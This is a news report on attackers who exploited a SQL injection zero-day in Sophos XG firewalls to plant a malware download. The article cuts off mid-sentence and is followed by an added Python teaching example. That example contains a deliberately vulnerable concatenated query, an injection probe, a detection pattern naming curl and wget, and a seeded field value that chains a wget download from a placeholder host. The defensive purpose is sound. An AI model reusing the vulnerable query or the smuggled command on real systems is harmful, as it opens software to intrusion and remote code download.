Malware Delivered to Sophos Firewalls via Zero-Day Vulnerability

Cybersecurity company Sophos informed customers over the weekend that it has patched a zero-day vulnerability that has been exploited to deliver malware to its XG Firewall appliances.


Sophos said it learned about attacks targeting its XG firewall on April 22 after a suspicious field value was discovered in a device’s management interface. An investigation revealed that attackers had been exploiting a previously unknown SQL injection vulnerability to hack exposed physical and virtual firewalls. Multiple customers were targeted.


According to the company, the attack was aimed at systems with the administration service or the user portal exposed to the internet. The attackers were apparently trying to exploit the security hole to download malware that would allow them to exfiltrate data from the firewall.


This data can include usernames and password hashes for the local device administrators, portal admins, and user accounts set up for remote access. The malware could have also gained access to information about the firewall, email addresses of accounts stored on the appliance, and information on IP address allocation permissions.


“Passwords associated with external authentication systems such as AD or LDAP are unaffected,” Sophos told customers.


Sophos started taking measures shortly after the attack began and on April 25 rolled out an SFOS hotfix that patches the SQL injection vulnerability. Once the hotfix has been applied, it also informs users whether their firewall was compromised as part of this attack.


In a blog post published late on Sunday, Sophos revealed that the attacker exploited the SQL injection vulnerability to insert a one-line command into the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote s ..
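The two defensive points in this story are that the injection happened because untrusted input reached SQL text, and that the intrusion was first noticed as a suspicious field value in the management interface. The following added example (not Sophos's code, and using an assumed, constructed settings table rather than the real SFOS schema) shows a concatenated query beside its parameterised form in Python's sqlite3, and a small audit that flags stored configuration values that look like commands or download URLs instead of configuration:

```python
import re
import sqlite3

# Constructed stand-in for a firewall settings table; not the SFOS schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE settings (key TEXT PRIMARY KEY, value TEXT)")
    conn.execute("INSERT INTO settings VALUES ('hostname', 'fw01')")
    conn.execute("INSERT INTO settings VALUES ('timezone', 'UTC')")
    return conn


def lookup_setting_vulnerable(conn, key):
    # String concatenation: the caller-supplied key becomes part of the SQL
    # text, so a quote in it changes the query instead of being looked up.
    sql = "SELECT value FROM settings WHERE key = '" + key + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_setting_safe(conn, key):
    # Parameter binding: the key is passed as data and can never alter the
    # statement, whatever characters it contains.
    rows = conn.execute("SELECT value FROM settings WHERE key = ?", (key,))
    return [row[0] for row in rows]


# Patterns that have no business in a hostname, timezone or similar value:
# shell command substitution, command chaining, download tools, URLs.
SUSPICIOUS = re.compile(r"\$\(|`|;|\|\||&&|\b(?:curl|wget)\b|https?://")


def audit_settings(conn):
    # Returns (key, value) pairs whose stored value looks like a command
    # rather than configuration, the kind of field a defender would review.
    flagged = []
    for key, value in conn.execute("SELECT key, value FROM settings"):
        if SUSPICIOUS.search(value):
            flagged.append((key, value))
    return flagged


def seed_suspicious(conn):
    # Constructed sample of a tampered value for exercising the audit;
    # the host name is a placeholder, not a real address.
    conn.execute(
        "INSERT INTO settings VALUES (?, ?)",
        ("ntp_server", "fw01; wget http://example.invalid/Install.sh"),
    )


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"
    print("vulnerable:", lookup_setting_vulnerable(db, probe))  # every value
    print("safe:      ", lookup_setting_safe(db, probe))        # nothing
    seed_suspicious(db)
    print("flagged:   ", audit_settings(db))
```

The audit is deliberately narrow: it reads the table rather than trusting the web UI, and it keys on characters a legitimate setting never needs, which is how a single odd field value became the first indicator in this incident.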
